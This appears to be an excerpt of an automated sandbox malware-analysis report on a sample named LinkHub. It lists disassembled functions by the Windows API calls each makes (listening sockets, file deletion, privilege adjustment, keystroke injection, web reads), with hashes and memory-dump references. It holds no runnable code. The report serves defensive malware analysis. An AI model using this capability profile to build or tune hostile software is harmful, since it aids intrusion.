WSAGetLastError.WSOCK32 ref: 00B81CE0
bind.WSOCK32(00000000,?,00000010), ref: 00B81D17
WSAGetLastError.WSOCK32 ref: 00B81D22
closesocket.WSOCK32(00000000), ref: 00B81D51
listen.WSOCK32(00000000,00000005), ref: 00B81D60
WSAGetLastError.WSOCK32 ref: 00B81D6A
closesocket.WSOCK32(00000000), ref: 00B81D99

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: a20fda287829e258acf84a84651696031564d40f7a47bc8b239c7185e154e3bb
Instruction ID: 8d0ef4c97371668cb92792ca8df1187628af04019f491ff3a4811b0f55108dbd
Opcode Fuzzy Hash: a20fda287829e258acf84a84651696031564d40f7a47bc8b239c7185e154e3bb
Instruction Fuzzy Hash: 70414D316011009FD710EF28C584B69BBE9EB45318F1885D9E8569F2E7C771ED86CBE1

Function 00B3BCD2 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B3BD54
_free.LIBCMT ref: 00B3BD78
_free.LIBCMT ref: 00B3BEFF
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BA46D0), ref: 00B3BF11
WideCharToMultiByte.KERNEL32(00000000,00000000,00BD221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00B3BF89
WideCharToMultiByte.KERNEL32(00000000,00000000,00BD2270,000000FF,?,0000003F,00000000,?), ref: 00B3BFB6
_free.LIBCMT ref: 00B3C0CB

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 7ea0559f5138ba96ac316f0137c971848d3428977b561f55f4393d9c90ce1387
Instruction ID: 25c4083198d7097f1b5544e01dbadcfa9f8483dedf0dbf14bb9c65384e00a6c4
Opcode Fuzzy Hash: 7ea0559f5138ba96ac316f0137c971848d3428977b561f55f4393d9c90ce1387
Instruction Fuzzy Hash: 4BC13A31900254AFDB249F78DC51FAABBF8EF55310F3445EAE6859B259EB308E41CB50

Function 00B6DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B05851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B055D1,?,?,00B44B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00B05871

Part of subcall function 00B6EAB0: GetFileAttributesW.KERNEL32(?,00B6D840), ref: 00B6EAB1

FindFirstFileW.KERNEL32(?,?), ref: 00B6DCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 00B6DD1B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B6DD2C
FindClose.KERNEL32(00000000), ref: 00B6DD43
FindClose.KERNEL32(00000000), ref: 00B6DD4C

Strings

\*.*, xrefs: 00B6DC9D

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: cbcb36efe508c5702e161c98a4e1bdcf2a32a428981e1608bfad1971a837e843
Instruction ID: 39ada9616e9d6fecad65a8a6d93b21adfca3b4a05f5847ed3abe0b507c450705
Opcode Fuzzy Hash: cbcb36efe508c5702e161c98a4e1bdcf2a32a428981e1608bfad1971a837e843
Instruction Fuzzy Hash: 4F315A31409345ABC300EF64C9959AFBBE8BE96300F404EADF4D5831D1EF25DA09DBA6

Function 00B73A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B456C2,?,?,00000000,00000000), ref: 00B73A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B456C2,?,?,00000000,00000000), ref: 00B73A35
LoadResource.KERNEL32(?,00000000,?,?,00B456C2,?,?,00000000,00000000,?,?,?,?,?,?,00B066CE), ref: 00B73A45
SizeofResource.KERNEL32(?,00000000,?,?,00B456C2,?,?,00000000,00000000,?,?,?,?,?,?,00B066CE), ref: 00B73A56
LockResource.KERNEL32(00B456C2,?,?,00B456C2,?,?,00000000,00000000,?,?,?,?,?,?,00B066CE,?), ref: 00B73A65

Strings

SCRIPT, xrefs: 00B73A2B

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 01ed6c6a00761f01731501435d65de90a0805194e37ea23c8fbc4db5fcc0925e
Instruction ID: b2db2dd2c17e8bfdd95ee1ab111d6d80544b8fcaf27f04eb20e250bb724d9ac6
Opcode Fuzzy Hash: 01ed6c6a00761f01731501435d65de90a0805194e37ea23c8fbc4db5fcc0925e
Instruction Fuzzy Hash: BC117C71200701BFD7218B26DD49F6BBBF9EBC5B40F1482ADB416A7160DB71E9009A20

Function 00B620AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B61900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B61916
Part of subcall function 00B61900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B61922
Part of subcall function 00B61900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B61931
Part of subcall function 00B61900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B61938
Part of subcall function 00B61900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B6194E

GetLengthSid.ADVAPI32(?,00000000,00B61C81), ref: 00B620FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B62107
HeapAlloc.KERNEL32(00000000), ref: 00B6210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 00B62127
GetProcessHeap.KERNEL32(00000000,00000000,00B61C81), ref: 00B6213B
HeapFree.KERNEL32(00000000), ref: 00B62142

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: c74193c54b0c50240e710f496bdda4cc011a2bb90fa2700610129c6e8e2f3b55
Instruction ID: a91ca2ab0adac9372d76659e70415f5279ce365f937d47f76b099b3dc9f9ad9b
Opcode Fuzzy Hash: c74193c54b0c50240e710f496bdda4cc011a2bb90fa2700610129c6e8e2f3b55
Instruction Fuzzy Hash: E211D072500604FFEB109F65CD09FAE7BB9EF46356F144099EA41A7120CB399941CB60

Function 00B7A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00B7A5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00B7A6D0

Part of subcall function 00B742B9: GetInputState.USER32 ref: 00B74310
Part of subcall function 00B742B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B743AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00B7A5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00B7A6BA

Strings

*.*, xrefs: 00B7A5A2

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: cd7cbdb2afe6afccce8fdca9301c6ece36de87ee0d8c3ba78f938133632c694a
Instruction ID: 00d67de40be48f9cbc045e62829c830a781ff7e63506c49fc5e7a052d55cb21f
Opcode Fuzzy Hash: cd7cbdb2afe6afccce8fdca9301c6ece36de87ee0d8c3ba78f938133632c694a
Instruction Fuzzy Hash: 7A412F7190020A9FCF54EFA4C945EEEBBF4EF55310F248096E819A21A1EB31DE54DF61

Function 00B022AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 00B0233E
GetSysColor.USER32(0000000F), ref: 00B02421
SetBkColor.GDI32(?,00000000), ref: 00B02434

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Color$Proc
String ID:
API String ID: 929743424-0
Opcode ID: e293aa2e01d9f19f20ea8c47f057c0c4236aafe3678a87ae3b2f91ee30e9d186
Instruction ID: 5c3189fe69f798cbc33de7513e0c7297b86fa15c9cc7ff13945a4c4b09961b87
Opcode Fuzzy Hash: e293aa2e01d9f19f20ea8c47f057c0c4236aafe3678a87ae3b2f91ee30e9d186
Instruction Fuzzy Hash: A6816AB0104400BEEA2D673C4CDCE7F6DDEEB42704F1A01D9F542C66D1C9599F46A27A

Function 00B82263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B83AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B83AD7
Part of subcall function 00B83AAB: _wcslen.LIBCMT ref: 00B83AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B822BA
WSAGetLastError.WSOCK32 ref: 00B822E1
bind.WSOCK32(00000000,?,00000010), ref: 00B82338
WSAGetLastError.WSOCK32 ref: 00B82343
closesocket.WSOCK32(00000000), ref: 00B82372

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: bd6c95685a4928f326618c82b2e87dbcc5c47868a55279a3579fdeae612b29eb
Instruction ID: 178ca2c0d85ec2edbb8b4094729456a89fdf4a4504b541fabae41765a677818a
Opcode Fuzzy Hash: bd6c95685a4928f326618c82b2e87dbcc5c47868a55279a3579fdeae612b29eb
Instruction Fuzzy Hash: 1351BE71A00200AFE710AF24C886F6A7BE5EB44758F4884D8F9459F3D3DA75AD42CBE1

Function 00B926DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00B9275C
IsWindowEnabled.USER32 ref: 00B9276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00B92777
IsIconic.USER32 ref: 00B92785
IsZoomed.USER32 ref: 00B92793

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: b08a78af21ca8135660acba6122a14deba6cd8de84dbf7130eaf968d70b9a680
Instruction ID: 1ce153e1fc85b99d39695ce2f35bb47a99827f721856e4297c4cae3b042aefe6
Opcode Fuzzy Hash: b08a78af21ca8135660acba6122a14deba6cd8de84dbf7130eaf968d70b9a680
Instruction Fuzzy Hash: F621E535B00210AFEB119F66D844B1A7BE5EF95314B1984B9E8499B352CB75EC42CBA0

Function 00B7D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00B7D8CE
GetLastError.KERNEL32(?,00000000), ref: 00B7D92F
SetEvent.KERNEL32(?,?,00000000), ref: 00B7D943

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 82e82e81c7d2bad0ad676eba7ef55c895c37ebea6ae159a1d22b1a477d097e33
Instruction ID: 84cb85d72ec0cbcaaa184563292e4661847b3e6689837bc1b75ad16dc4ef70bf
Opcode Fuzzy Hash: 82e82e81c7d2bad0ad676eba7ef55c895c37ebea6ae159a1d22b1a477d097e33
Instruction Fuzzy Hash: 6521C171500705EFE7209FA6D988BABB7FCEF40354F10849EE26A92141EB70EE04CB50

Function 00B6E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00B446AC), ref: 00B6E482
GetFileAttributesW.KERNEL32(?), ref: 00B6E491
FindFirstFileW.KERNEL32(?,?), ref: 00B6E4A2
FindClose.KERNEL32(00000000), ref: 00B6E4AE

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: f559c9a22a16a2465a4022e1f027992a83471c3c55ab3054efd30c4113f7e289
Instruction ID: 8ffea4fb62b50ed1fe3f6e816d78b2a58a9957063a2b16556bc8ca333472fd2c
Opcode Fuzzy Hash: f559c9a22a16a2465a4022e1f027992a83471c3c55ab3054efd30c4113f7e289
Instruction Fuzzy Hash: 31F0A0314109205792106B38EE0D8AE76ADAE02335B504B82F836C32E0DF7CD9958A95

Function 00B5E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00B5E5F8

Strings

%.3d, xrefs: 00B5E603
X64, xrefs: 00B5E680

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 21cbb743032d539d4caf517d0c15d5701c510a5682d414e1d1620a24bc119ea2
Instruction ID: 6e5620049e68e75eaa2e73ba24310b5357abe9563a394ec0de00f3f9ec7151c0
Opcode Fuzzy Hash: 21cbb743032d539d4caf517d0c15d5701c510a5682d414e1d1620a24bc119ea2
Instruction Fuzzy Hash: 4ED012B1C08119D6CBC89B90DDC8EB973FCBB28341F6044D6FD16D1010EA20DA4C9721

Function 00B32992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B32A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B32A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B32AA1

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e878e14bbc9e3382b318c3388671a87807456861bd6ec0b5c1b3defe2a14663d
Instruction ID: 421ef94770f60691bbdbcef5cd02c888bfa58321b2852ca16ba1ce6a9348cdb9
Opcode Fuzzy Hash: e878e14bbc9e3382b318c3388671a87807456861bd6ec0b5c1b3defe2a14663d
Instruction Fuzzy Hash: AF31977591122C9BCB21DF68D98979DBBF4BF08310F5042EAE81CA7251EB709F858F45

Function 00B62010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00B2014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00B209D8
Part of subcall function 00B2014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00B209F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B6205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B62087
GetLastError.KERNEL32 ref: 00B62097

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 63401cfcbb8c2f3f335ee2b203628e4f925f853b583da3c069c4bdcef3ace690
Instruction ID: 32b675c69d05f57ea187bb7316dc1cf39071d35909da9d4c46c2f5c0c932842f
Opcode Fuzzy Hash: 63401cfcbb8c2f3f335ee2b203628e4f925f853b583da3c069c4bdcef3ace690
Instruction Fuzzy Hash: CE11C1B2414305AFE718AF54EDC6D6BB7F8EB04711B20845EF04653251DB74BC41CB24

Function 00B5E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00B5E664

Strings

X64, xrefs: 00B5E680

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 6fa53ce20b75f669045a9a192b71dea6e3784710d1c4041ee225c9ca05f6356d
Instruction ID: c55a79a3c470f1e4a635bb095f83bc35fb3a858307fd266de6429a07e15c5a11
Opcode Fuzzy Hash: 6fa53ce20b75f669045a9a192b71dea6e3784710d1c4041ee225c9ca05f6356d
Instruction Fuzzy Hash: ACD0C9B480511DEADB80CF50ECC8EDD73BCBB14304F100692F546E2100DB3096488B10

Function 00B741FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00B852EE,?,?,00000035,?), ref: 00B74229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00B852EE,?,?,00000035,?), ref: 00B74239

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 8570ba4f60339397bf81009f4bf45041a477b5eea47e990e752e8e432b33aaf7
Instruction ID: 998cdc2141f8815970a48d369c909259a179442f1f1ce85697bc13e859979aad
Opcode Fuzzy Hash: 8570ba4f60339397bf81009f4bf45041a477b5eea47e990e752e8e432b33aaf7
Instruction Fuzzy Hash: 3FF0E5307142246AE7201766AD4DFEB7AADEFC5762F0001B6F509D3181DA709A00C6B0

Function 00B6BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B6BC24
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00B6BC37

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
